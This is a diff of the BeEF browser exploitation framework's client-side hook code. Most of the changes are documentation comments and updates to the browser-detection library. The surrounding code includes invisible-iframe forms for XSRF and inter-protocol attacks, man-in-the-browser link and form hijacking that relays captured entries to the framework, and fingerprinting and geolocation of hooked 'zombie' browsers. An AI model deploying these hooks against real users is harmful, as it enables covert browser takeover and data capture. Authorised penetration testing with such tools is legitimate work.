-	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 * @param {String} old_protocol: the old link protocol to be rewritten
+	 * @param {String} new_protocol: the new link protocol to be written
+	 * @param {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return {Number} the amount of links found in the DOM and rewritten.
 	 */
 	rewriteLinksProtocol: function(old_protocol, new_protocol, selector) {

@@ -319,9 +318,9 @@ beef.dom = {

 	/**
 	 * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
-	 * @param: {String} new_number: the new link telephone number to be written
-	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
-	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 * @param {String} new_number: the new link telephone number to be written
+	 * @param {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return {Number} the amount of links found in the DOM and rewritten.
 	 */
 	rewriteTelLinks: function(new_number, selector) {

@@ -343,9 +342,9 @@ beef.dom = {
 	},

    /**
-     *  Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
-     * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
-     * @return: {String} the parameters as a string ready to append to applet/embed/object tags (ex.: <param name='abc' value='test' />).
+     * Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
+     * @param {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
+     * @return {String} the parameters as a string ready to append to applet/embed/object tags (ex.: <param name='abc' value='test' />).
     */
    parseAppletParams: function(params){
         var result = '';
@@ -364,11 +363,11 @@ beef.dom = {
     * beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D.class', null, 'http://127.0.0.1:3000/ui/media/images/target.jar', [{'param1':'1', 'param2':'2'}]);
     * example usage in the code, using codebase:
     * beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D', 'http://127.0.0.1:3000/', null, null);
-     * @params: {String} id: reference identifier to the applet.
-     * @params: {String} code: name of the class to be loaded. For example, beef.class.
-     * @params: {String} codebase: the URL of the codebase (usually used when loading a single class for an unsigned applet).
-     * @params: {String} archive: the jar that contains the code.
-     * @params: {String} params: an array of additional params that the applet except.
+     * @param {String} id: reference identifier to the applet.
+     * @param {String} code: name of the class to be loaded. For example, beef.class.
+     * @param {String} codebase: the URL of the codebase (usually used when loading a single class for an unsigned applet).
+     * @param {String} archive: the jar that contains the code.
+     * @param {String} params: an array of additional params that the applet except.
     */
    attachApplet: function(id, name, code, codebase, archive, params) {
        var content = null;
@@ -432,7 +431,7 @@ beef.dom = {

    /**
     * Given an id, remove the applet from the DOM.
-     * @params: {String} id: reference identifier to the applet.
+     * @param {String} id: reference identifier to the applet.
     */
    detachApplet: function(id) {
        $j('#' + id + '').detach();
@@ -440,10 +439,10 @@ beef.dom = {

    /**
     * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
-     * @params: {String} action: the form action attribute, where the request will be sent.
-     * @params: {String} method: HTTP method, usually POST.
-     * @params: {String} enctype: form encoding type
-     * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
+     * @param {String} action: the form action attribute, where the request will be sent.
+     * @param {String} method: HTTP method, usually POST.
+     * @param {String} enctype: form encoding type
+     * @param {Array} inputs: an array of inputs to be added to the form (type, name, value).
     *         example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
     */
    createIframeXsrfForm: function(action, method, enctype, inputs){
@@ -477,9 +476,9 @@ beef.dom = {

    /**
     * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
-     * @params: {String} rhost: remote host ip/domain
-     * @params: {String} rport: remote port
-     * @params: {String} commands: protocol commands to be executed by the remote host:port service
+     * @param {String} rhost: remote host ip/domain
+     * @param {String} rport: remote port
+     * @param {String} commands: protocol commands to be executed by the remote host:port service
     */
    createIframeIpecForm: function(rhost, rport, path, commands){
        var iframeIpec = beef.dom.createInvisibleIframe();
--- a/core/main/client/encode/base64.js
+++ b/core/main/client/encode/base64.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -8,10 +8,18 @@

 beef.encode = {};

+/** 
+ * Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
+ * @namespace beef.encode.base64 
+ */
 beef.encode.base64 = {
 	
 	keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
-
+    /** 
+     * @memberof beef.encode.base64 
+     * @param {string} input
+     * @return {string}
+     */
    encode : function (input) {
        if (window.btoa) {
           return btoa(unescape(encodeURIComponent(input)));
@@ -49,7 +57,11 @@ beef.encode.base64 = {
        return output;
    },

-
+    /** 
+     * @memberof beef.encode.base64 
+     * @param {string} input
+     * @return {string}
+     */
    decode : function (input) {
        if (window.atob) {
            return escape(atob(input));
@@ -90,8 +102,12 @@ beef.encode.base64 = {

    },

-
-   utf8_encode : function (string) {
+    /** 
+     * @memberof beef.encode.base64 
+     * @param {string} string
+     * @return {string}
+     */
+    utf8_encode : function (string) {
        string = string.replace(/\r\n/g,"\n");
        var utftext = "";

@@ -116,7 +132,11 @@ beef.encode.base64 = {

        return utftext;
    },
-
+    /** 
+     * @memberof beef.encode.base64 
+     * @param {string} utftext
+     * @return {string} 
+     */
    utf8_decode : function (utftext) {
        var string = "";
        var i = 0;
--- a/core/main/client/encode/json.js
+++ b/core/main/client/encode/json.js
@@ -1,13 +1,19 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

-// Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
+/** 
+ * Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
+ * @namespace beef.encode.json
+ */

 beef.encode.json = {
-	
+	/**
+     * @memberof beef.encode.json
+     * @param o 
+     */
 	stringify: function(o) {
        if (typeof(JSON) == 'object' && JSON.stringify) {
            // Error on stringifying cylcic structures caused polling to die
@@ -97,7 +103,10 @@ beef.encode.json = {
            return "{" + pairs.join(", ") + "}";
        }
    },
-
+    /**
+     * @memberof beef.encode.json
+     * @param string 
+     */
    quoteString: function(string) {
        if (string.match(this._escapeable))
        {
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -1,25 +1,30 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

-/*!
- * @literal object: beef.geolocation
- *
+/**
 * Provides functionalities to use the geolocation API.
+ * @namespace beef.geolocation
 */
+
 beef.geolocation = {

    /**
-     * check if browser supports the geolocation API
+     * Check if browser supports the geolocation API
+     * @return {boolean}
     */
    isGeolocationEnabled: function(){
 		return !!navigator.geolocation;
    },

-    /*
-     * given latitude/longitude retrieves exact street position of the zombie
+    /** 
+     * Given latitude/longitude retrieves exact street position of the zombie
+     * @param command_url
+     * @param command_id
+     * @param latitude
+     * @param longitude
     */
    getOpenStreetMapAddress: function(command_url, command_id, latitude, longitude){

@@ -56,8 +61,10 @@ beef.geolocation = {

    },

-    /*
-     * retrieve latitude/longitude using the geolocation API
+    /**
+     * Retrieve latitude/longitude using the geolocation API
+     * @param command_url
+     * @param command_id
     */
    getGeolocation: function (command_url, command_id){

--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -1,16 +1,20 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

+/**
+ * @namespace beef.hardware
+ */
+
 beef.hardware = {

  ua: navigator.userAgent,

-  /*
-   * @return: {String} CPU type
-   **/
+  /**
+   * @return {String} CPU type
+   */
  getCpuArch: function() {
    var arch = 'UNKNOWN';
    // note that actually WOW64 means IE 32bit and Windows 64 bit. we are more interested
@@ -39,7 +43,8 @@ beef.hardware = {

  /**
   * Returns number of CPU cores
-   **/
+   * @return {String}
+   */
  getCpuCores: function() {
    var cores = 'unknown';
    try {
@@ -54,7 +59,8 @@ beef.hardware = {

  /**
   * Returns CPU details
-   **/
+   * @return {String}
+   */
  getCpuDetails: function() {
    return {
      arch: beef.hardware.getCpuArch(),
@@ -64,7 +70,8 @@ beef.hardware = {

  /**
   * Returns GPU details
-   **/
+   * @return {object}
+   */
  getGpuDetails: function() {
    var gpu = 'unknown';
    var vendor = 'unknown';
@@ -98,7 +105,8 @@ beef.hardware = {

  /**
   * Returns RAM (GiB)
-   **/
+   * @return {String}
+   */
  getMemory: function() {
    var memory = 'unknown';
    try {
@@ -113,7 +121,8 @@ beef.hardware = {

  /**
   * Returns battery details
-   **/
+   * @return {Object}
+   */
  getBatteryDetails: function() {
    var battery = navigator.battery || navigator.webkitBattery || navigator.mozBattery;

@@ -136,6 +145,7 @@ beef.hardware = {

  /**
   * Returns zombie screen size and color depth.
+   * @return {Object}
   */
  getScreenSize: function () {
    return {
@@ -145,17 +155,19 @@ beef.hardware = {
    }
  },

-  /*
-   * @return: {Boolean} true or false.
-   **/
+  /**
+   * Is touch enabled?
+   * @return {Boolean} true or false.
+   */
  isTouchEnabled: function() {
    if ('ontouchstart' in document) return true;
    return false;
  },

-  /*
-   * @return: {Boolean} true or false.
-   **/
+  /**
+   * Is virtual machine?
+   * @return {Boolean} true or false.
+   */
  isVirtualMachine: function() {
    if (this.getGpuDetails().vendor.match('VMware, Inc'))
      return true;
@@ -171,9 +183,10 @@ beef.hardware = {
    return false;
  },

-  /*
-   * @return: {Boolean} true or false.
-   **/
+  /**
+   * Is a Laptop?
+   * @return {Boolean} true or false.
+   */
  isLaptop: function() {
    if (this.isMobileDevice()) return false;
    // Most common laptop screen resolution
@@ -183,64 +196,70 @@ beef.hardware = {
    return false;
  },

-  /*
-   * @return: {Boolean} true or false.
-   **/
+  /**
+   * Is Nokia?
+   * @return {Boolean} true or false.
+   */
  isNokia: function() {
    return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)|(Lumia )')) ? true : false;
  },

-  /*
-   * @return: {Boolean} true or false.
-   **/
+  /**
+   * Is Zune?
+   * @return {Boolean} true or false.
+   */
  isZune: function() {
    return (this.ua.match('ZuneWP7')) ? true : false;
  },

-  /*
-   * @return: {Boolean} true or false.
-   **/
+  /**
+   * Is HTC?
+   * @return {Boolean} true or false.
+   */
  isHtc: function() {
    return (this.ua.match('HTC')) ? true : false;
  },

-  /*
-   * @return: {Boolean} true or false.
-   **/
+  /**
+   * Is Ericsson?
+   * @return {Boolean} true or false.
+   */
  isEricsson: function() {
    return (this.ua.match('Ericsson')) ? true : false;
  },

-  /*
-   * @return: {Boolean} true or false.
-   **/
+  /**
+   * Is Motorola?
+   * @return {Boolean} true or false.
+   */
  isMotorola: function() {
    return (this.ua.match('Motorola')) ? true : false;
  },

-  /*
-   * @return: {Boolean} true or false.
-   **/
+  /**
+   * Is Google?
+   * @return {Boolean} true or false.
+   */
  isGoogle: function() {
    return (this.ua.match('Nexus One')) ? true : false;
  },

  /**
   * Returns true if the browser is on a Mobile device
-   * @return: {Boolean} true or false
+   * @return {Boolean} true or false
   *
   * @example: if(beef.hardware.isMobileDevice()) { ... }
-   **/
+   */
  isMobileDevice: function() {
    return MobileEsp.DetectMobileQuick();
  },

  /**
   * Returns true if the browser is on a game console
-   * @return: {Boolean} true or false
+   * @return {Boolean} true or false
   *
   * @example: if(beef.hardware.isGameConsole()) { ... }
-   **/
+   */
  isGameConsole: function() {
    return MobileEsp.DetectGameConsole();
  },
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -1,17 +1,18 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

 /**
- * @literal object: beef.init
 * Contains the beef_init() method which starts the BeEF client-side
 * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
 *
 * If beef.pageIsLoaded is true, then this JS has been loaded >1 times
 * and will have a new session id. The new session id will need to know
 * the brwoser details. So sendback the browser details again.
+ * 
+ * @namespace beef.init
 */

 beef.session.get_hook_session_id();
@@ -19,11 +20,15 @@ beef.session.get_hook_session_id();
 if (beef.pageIsLoaded) {
    beef.net.browser_details();
 }
-
+/**
+ * @memberof beef.init
+ */
 window.onload = function () {
    beef_init();
 };
-
+/**
+ * @memberof beef.init
+ */
 window.onpopstate = function (event) {
    if (beef.onpopstate.length > 0) {
        event.preventDefault;
@@ -38,7 +43,9 @@ window.onpopstate = function (event) {
        }
    }
 };
-
+/**
+ * @memberof beef.init
+ */
 window.onclose = function (event) {
    if (beef.onclose.length > 0) {
        event.preventDefault;
@@ -60,6 +67,7 @@ window.onclose = function (event) {
 *  - the polling starts (checks for new commands, and execute them)
 *  - the logger component is initialized (see logger.js)
 *  - the Autorun Engine is initialized (see are.js)
+ * @memberof beef.init
 */
 function beef_init() {
    if (!beef.pageIsLoaded) {
--- a/core/main/client/lib/browser_jools.js
+++ b/core/main/client/lib/browser_jools.js
@@ -1,3 +1,12 @@
+/**
+ * @namespace browser_jools
+ */
+
+/**
+ * @memberof browser_jools
+ * @param file 
+ * @param cwd 
+ */
 var require = function (file, cwd) {
    var resolved = require.resolve(file, cwd || '/');
    var mod = require.modules[resolved];
@@ -19,7 +28,9 @@ require._core = {
    'path': true,
    'vm': true
 };
-
+/**
+ * @memberof browser_jools
+ */
 require.resolve = (function () {
    return function (x, cwd) {
        if (!cwd) cwd = '/';
@@ -104,7 +115,9 @@ require.resolve = (function () {
        }
    };
 })();
-
+/**
+ * @memberof browser_jools
+ */
 require.alias = function (from, to) {
    var path = require.modules.path();
    var res = null;
@@ -133,7 +146,9 @@ require.alias = function (from, to) {
        }
    }
 };
-
+/**
+ * @memberof browser_jools
+ */
 require.define = function (filename, fn) {
    var dirname = require._core[filename]
        ? ''
@@ -215,10 +230,15 @@ function filter (xs, fn) {
    return res;
 }

-// resolves . and .. elements in a path array with directory names there
-// must be no slashes, empty elements, or device names (c:\) in the array
-// (so also no leading and trailing slashes - it does not distinguish
-// relative and absolute paths)
+/**
+ * resolves . and .. elements in a path array with directory names there
+ * must be no slashes, empty elements, or device names (c:\) in the array
+ * (so also no leading and trailing slashes - it does not distinguish
+ * relative and absolute paths)
+ * @memberof browser_jools
+ * @param parts 
+ * @param allowAboveRoot 
+ */
 function normalizeArray(parts, allowAboveRoot) {
  // if the path tries to go above the root, `up` ends up > 0
  var up = 0;
@@ -357,6 +377,7 @@ var utils = require('./utils')

 /**
 * version
+ * @memberof browser_jools
 */
 exports.version = '0.0.1';

@@ -367,7 +388,7 @@ exports.version = '0.0.1';
 *   - Descriptive name
 *   - One or more conditions
 *   - One or more consequences, which are fired when all conditions evaluate to true.
- *
+ * @memberof browser_jools
 * @param {Object} rules
 */
 function Jools(rules) {
@@ -426,7 +447,7 @@ module.exports = Jools;
 require.define("/node_modules/jools/lib/utils.js", function (require, module, exports, __dirname, __filename) {
 /**
 * Returns an array of parameter names of the function f
- *
+ * @memberof browser_jools
 * @param {Function} f
 */
 module.exports.paramNames = function (f) {
@@ -443,7 +464,7 @@ module.exports.paramNames = function (f) {

 /**
 * Creates an array of arguments
- *
+ * @memberof browser_jools
 * @param {Object} obj
 * @param {Array} params
 */
--- a/core/main/client/lib/evercookie.js
+++ b/core/main/client/lib/evercookie.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/lib/jquery-migrate-1.4.1.js
+++ b/core/main/client/lib/jquery-migrate-1.4.1.js
@@ -16,10 +16,10 @@ var warnedAbout = {};
 jQuery.migrateWarnings = [];

 // Set to true to prevent console output; migrateWarnings still maintained
-// jQuery.migrateMute = false;
+jQuery.migrateMute = true;

 // Show a message on the console so devs know we're active
-if ( window.console && window.console.log ) {
+	if (window.console && window.console.log && !jQuery.migrateMute) {
 	window.console.log( "JQMIGRATE: Migrate is installed" +
 		( jQuery.migrateMute ? "" : " with logging active" ) +
 		", version " + jQuery.migrateVersion );
@@ -27,7 +27,7 @@ if ( window.console && window.console.log ) {

 // Set to false to disable traces that appear with warnings
 if ( jQuery.migrateTrace === undefined ) {
-	jQuery.migrateTrace = true;
+	jQuery.migrateTrace = false;
 }

 // Forget any warnings we've already given; public
--- a/core/main/client/lib/platform.js
+++ b/core/main/client/lib/platform.js
@@ -1,6 +1,6 @@
 /*!
 * Platform.js
- * Copyright 2014-2018 Benjamin Tan
+ * Copyright 2014-2020 Benjamin Tan
 * Copyright 2011-2013 John-David Dalton
 * Available under MIT license
 */
@@ -339,7 +339,7 @@

    /* Detectable layout engines (order is important). */
    var layout = getLayout([
-      { 'label': 'EdgeHTML', 'pattern': '(?:Edge|EdgA|EdgiOS)' },
+      { 'label': 'EdgeHTML', 'pattern': 'Edge' },
      'Trident',
      { 'label': 'WebKit', 'pattern': 'AppleWebKit' },
      'iCab',
@@ -369,7 +369,7 @@
      'Konqueror',
      'Lunascape',
      'Maxthon',
-      { 'label': 'Microsoft Edge', 'pattern': '(?:Edge|EdgA|EdgiOS)' },
+      { 'label': 'Microsoft Edge', 'pattern': '(?:Edge|Edg|EdgA|EdgiOS)' },
      'Midori',
      'Nook Browser',
      'PaleMoon',
@@ -385,13 +385,18 @@
      { 'label': 'SRWare Iron', 'pattern': 'Iron' },
      'Sunrise',
      'Swiftfox',
+      'Vivaldi',
      'Waterfox',
      'WebPositive',
+      { 'label': 'Yandex Browser', 'pattern': 'YaBrowser' },
+      { 'label': 'UC Browser', 'pattern': 'UCBrowser' },
      'Opera Mini',
      { 'label': 'Opera Mini', 'pattern': 'OPiOS' },
      'Opera',
      { 'label': 'Opera', 'pattern': 'OPR' },
+      'Chromium',
      'Chrome',
+      { 'label': 'Chrome', 'pattern': '(?:HeadlessChrome)' },
      { 'label': 'Chrome Mobile', 'pattern': '(?:CriOS|CrMo)' },
      { 'label': 'Firefox', 'pattern': '(?:Firefox|Minefield)' },
      { 'label': 'Firefox for iOS', 'pattern': 'FxiOS' },
@@ -437,6 +442,7 @@
    /* Detectable manufacturers. */
    var manufacturer = getManufacturer({
      'Apple': { 'iPad': 1, 'iPhone': 1, 'iPod': 1 },
+      'Alcatel': {},
      'Archos': {},
      'Amazon': { 'Kindle': 1, 'Kindle Fire': 1 },
      'Asus': { 'Transformer': 1 },
@@ -445,22 +451,28 @@
      'Google': { 'Google TV': 1, 'Nexus': 1 },
      'HP': { 'TouchPad': 1 },
      'HTC': {},
+      'Huawei': {},
+      'Lenovo': {},
      'LG': {},
      'Microsoft': { 'Xbox': 1, 'Xbox One': 1 },
      'Motorola': { 'Xoom': 1 },
      'Nintendo': { 'Wii U': 1,  'Wii': 1 },
      'Nokia': { 'Lumia': 1 },
+      'Oppo': {},
      'Samsung': { 'Galaxy S': 1, 'Galaxy S2': 1, 'Galaxy S3': 1, 'Galaxy S4': 1 },
-      'Sony': { 'PlayStation': 1, 'PlayStation Vita': 1 }
+      'Sony': { 'PlayStation': 1, 'PlayStation Vita': 1 },
+      'Xiaomi': { 'Mi': 1, 'Redmi': 1 }
    });

    /* Detectable operating systems (order is important). */
    var os = getOS([
      'Windows Phone',
+      'KaiOS',
      'Android',
      'CentOS',
      { 'label': 'Chrome OS', 'pattern': 'CrOS' },
      'Debian',
+      { 'label': 'DragonFly BSD', 'pattern': 'DragonFly' },
      'Fedora',
      'FreeBSD',
      'Gentoo',
@@ -616,9 +628,26 @@
    // Convert layout to an array so we can add extra details.
    layout && (layout = [layout]);

+    // Detect Android products.
+    // Browsers on Android devices typically provide their product IDS after "Android;"
+    // up to "Build" or ") AppleWebKit".
+    // Example:
+    // "Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5) Plus) AppleWebKit/537.36
+    // (KHTML, like Gecko) Chrome/70.0.3538.80 Mobile Safari/537.36"
+    if (/\bAndroid\b/.test(os) && !product &&
+        (data = /\bAndroid[^;]*;(.*?)(?:Build|\) AppleWebKit)\b/i.exec(ua))) {
+      product = trim(data[1])
+        // Replace any language codes (eg. "en-US").
+        .replace(/^[a-z]{2}-[a-z]{2};\s*/i, '')
+        || null;
+    }
    // Detect product names that contain their manufacturer's name.
    if (manufacturer && !product) {
      product = getProduct([manufacturer]);
+    } else if (manufacturer && product) {
+      product = product
+        .replace(RegExp('^(' + qualify(manufacturer) + ')[-_.\\s]', 'i'), manufacturer + ' ')
+        .replace(RegExp('^(' + qualify(manufacturer) + ')[-_.]?(\\w)', 'i'), manufacturer + ' $2');
    }
    // Clean up Google TV.
    if ((data = /\bGoogle TV\b/.exec(product))) {
@@ -646,7 +675,7 @@
        : '');
    }
    // Detect Kubuntu.
-    else if (name == 'Konqueror' && !/buntu/i.test(os)) {
+    else if (name == 'Konqueror' && /^Linux\b/i.test(os)) {
      os = 'Kubuntu';
    }
    // Detect Android browsers.
@@ -666,6 +695,10 @@
        description.unshift('accelerated');
      }
    }
+    // Detect UC Browser speed mode.
+    else if (name == 'UC Browser' && /\bUCWEB\b/.test(ua)) {
+      description.push('speed mode');
+    }
    // Detect PaleMoon identifying as Firefox.
    else if (name == 'PaleMoon' && (data = /\bFirefox\/([\d.]+)\b/.exec(ua))) {
      description.push('identifying as Firefox ' + data[1]);
@@ -695,7 +728,7 @@
    // Detect non-Opera (Presto-based) versions (order is important).
    if (!version) {
      version = getVersion([
-        '(?:Cloud9|CriOS|CrMo|Edge|EdgA|EdgiOS|FxiOS|IEMobile|Iron|Opera ?Mini|OPiOS|OPR|Raven|SamsungBrowser|Silk(?!/[\\d.]+$))',
+        '(?:Cloud9|CriOS|CrMo|Edge|Edg|EdgA|EdgiOS|FxiOS|HeadlessChrome|IEMobile|Iron|Opera ?Mini|OPiOS|OPR|Raven|SamsungBrowser|Silk(?!/[\\d.]+$)|UCBrowser|YaBrowser)',
        'Version',
        qualify(name),
        '(?:Firefox|Minefield|NetFront)'
@@ -823,7 +856,7 @@
        (prerelease == 'beta' ? beta : alpha) + (/\d+\+?/.exec(data) || '');
    }
    // Detect Firefox Mobile.
-    if (name == 'Fennec' || name == 'Firefox' && /\b(?:Android|Firefox OS)\b/.test(os)) {
+    if (name == 'Fennec' || name == 'Firefox' && /\b(?:Android|Firefox OS|KaiOS)\b/.test(os)) {
      name = 'Firefox Mobile';
    }
    // Obscure Maxthon's unreliable version.
@@ -919,7 +952,7 @@
        version = null;
      }
      // Use the full Chrome version when available.
-      data[1] = (/\bChrome\/([\d.]+)/i.exec(ua) || 0)[1];
+      data[1] = (/\b(?:Headless)?Chrome\/([\d.]+)/i.exec(ua) || 0)[1];
      // Detect Blink layout engine.
      if (data[0] == 537.36 && data[2] == 537.36 && parseFloat(data[1]) >= 28 && layout == 'WebKit') {
        layout = ['Blink'];
@@ -928,7 +961,7 @@
      // http://stackoverflow.com/questions/6768474/how-can-i-detect-which-javascript-engine-v8-or-jsc-is-used-at-runtime-in-androi
      if (!useFeatures || (!likeChrome && !data[1])) {
        layout && (layout[1] = 'like Safari');
-        data = (data = data[0], data < 400 ? 1 : data < 500 ? 2 : data < 526 ? 3 : data < 533 ? 4 : data < 534 ? '4+' : data < 535 ? 5 : data < 537 ? 6 : data < 538 ? 7 : data < 601 ? 8 : '8');
+        data = (data = data[0], data < 400 ? 1 : data < 500 ? 2 : data < 526 ? 3 : data < 533 ? 4 : data < 534 ? '4+' : data < 535 ? 5 : data < 537 ? 6 : data < 538 ? 7 : data < 601 ? 8 : data < 602 ? 9 : data < 604 ? 10 : data < 606 ? 11 : data < 608 ? 12 : '12');
      } else {
        layout && (layout[1] = 'like Chrome');
        data = data[1] || (data = data[0], data < 530 ? 1 : data < 532 ? 2 : data < 532.05 ? 3 : data < 533 ? 4 : data < 534.03 ? 5 : data < 534.07 ? 6 : data < 534.10 ? 7 : data < 534.13 ? 8 : data < 534.16 ? 9 : data < 534.24 ? 10 : data < 534.30 ? 11 : data < 535.01 ? 12 : data < 535.02 ? '13+' : data < 535.07 ? 15 : data < 535.11 ? 16 : data < 535.19 ? 17 : data < 536.05 ? 18 : data < 536.10 ? 19 : data < 537.01 ? 20 : data < 537.11 ? '21+' : data < 537.13 ? 23 : data < 537.18 ? 24 : data < 537.24 ? 25 : data < 537.36 ? 26 : layout != 'Blink' ? '27' : '28');
@@ -938,6 +971,8 @@
      // Obscure version for some Safari 1-2 releases.
      if (name == 'Safari' && (!version || parseInt(version) > 45)) {
        version = data;
+      } else if (name == 'Chrome' && /\bHeadlessChrome/i.test(ua)) {
+        description.unshift('headless');
      }
    }
    // Detect Opera desktop modes.
@@ -965,16 +1000,24 @@
        os = null;
      }
    }
+    // Newer versions of SRWare Iron uses the Chrome tag to indicate its version number.
+    else if (/\bSRWare Iron\b/.test(name) && !version) {
+      version = getVersion('Chrome');
+    }
    // Strip incorrect OS versions.
    if (version && version.indexOf((data = /[\d.]+$/.exec(os))) == 0 &&
        ua.indexOf('/' + data + '-') > -1) {
      os = trim(os.replace(data, ''));
    }
+    // Ensure OS does not include the browser name.
+    if (os && os.indexOf(name) != -1 && !RegExp(name + ' OS').test(os)) {
+      os = os.replace(RegExp(' *' + qualify(name) + ' *'), '');
+    }
    // Add layout engine.
    if (layout && !/\b(?:Avant|Nook)\b/.test(name) && (
        /Browser|Lunascape|Maxthon/.test(name) ||
        name != 'Safari' && /^iOS/.test(os) && /\bSafari\b/.test(layout[1]) ||
-        /^(?:Adobe|Arora|Breach|Midori|Opera|Phantom|Rekonq|Rock|Samsung Internet|Sleipnir|Web)/.test(name) && layout[1])) {
+        /^(?:Adobe|Arora|Breach|Midori|Opera|Phantom|Rekonq|Rock|Samsung Internet|Sleipnir|SRWare Iron|Vivaldi|Web)/.test(name) && layout[1])) {
      // Don't add layout details to description if they are falsey.
      (data = layout[layout.length - 1]) && description.push(data);
    }
@@ -1143,8 +1186,8 @@
       *
       * Common values include:
       * "Windows", "Windows Server 2008 R2 / 7", "Windows Server 2008 / Vista",
-       * "Windows XP", "OS X", "Ubuntu", "Debian", "Fedora", "Red Hat", "SuSE",
-       * "Android", "iOS" and "Windows Phone"
+       * "Windows XP", "OS X", "Linux", "Ubuntu", "Debian", "Fedora", "Red Hat",
+       * "SuSE", "Android", "iOS" and "Windows Phone"
       *
       * @memberOf platform.os
       * @type string|null
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -1,13 +1,12 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

-/*!
- * @literal object: beef.logger
- *
+/**
 * Provides logging capabilities.
+ * @namespace beef.logger
 */
 beef.logger = {
 	
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -1,15 +1,18 @@
 //
-// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

-
+/**
+ * @namespace beef.mitb
+ */
 beef.mitb = {

    cid:null,
    curl:null,

+    /** Initializes */ 
    init:function (cid, curl) {
        beef.mitb.cid = cid;
        beef.mitb.curl = curl;
@@ -61,7 +64,7 @@ beef.mitb = {
        }
    },

-    // Initializes the hook on anchors and forms.
+    /** Initializes the hook on anchors and forms. */ 
    hook:function () {
        beef.onpopstate.push(function (event) {
            beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
@@ -92,7 +95,7 @@ beef.mitb = {
        }
    },

-    // Hooks anchors and prevents them from linking away
+    /** Hooks anchors and prevents them from linking away */
    poisonAnchor:function (e) {
        try {
            e.preventDefault;
@@ -111,7 +114,7 @@ beef.mitb = {
        return false;
    },

-    // Hooks forms and prevents them from linking away
+    /** Hooks forms and prevents them from linking away */
    poisonForm:function (form) {
        form.onsubmit = function (e) {

@@ -154,7 +157,7 @@ beef.mitb = {
        }
    },

-    // Fetches a hooked form with AJAX
+    /** Fetches a hooked form with AJAX */ 
    fetchForm:function (url, query, target) {
        try {
            var y = new XMLHttpRequest();
@@ -174,7 +177,7 @@ beef.mitb = {
        }
    },

-    // Fetches a hooked link with AJAX
+    /** Fetches a hooked link with AJAX */
    fetch:function (url, target) {
        try {
            var y = new XMLHttpRequest();
@@ -195,7 +198,7 @@ beef.mitb = {
        }
    },

-    // Fetches a window.location=http://domainname.com and setting up history
+    /** Fetches a window.location=http://domainname.com and setting up history */ 
    fetchOnclick:function (url) {
        try {
            var target = document.getElementsByTagName("html")[0];
@@ -225,7 +228,7 @@ beef.mitb = {
        }
    },

-    // Relays an entry to the framework
+    /** Relays an entry to the framework */
    sniff:function (result) {
        try {
            beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
@@ -234,7 +237,7 @@ beef.mitb = {
        return true;
    },

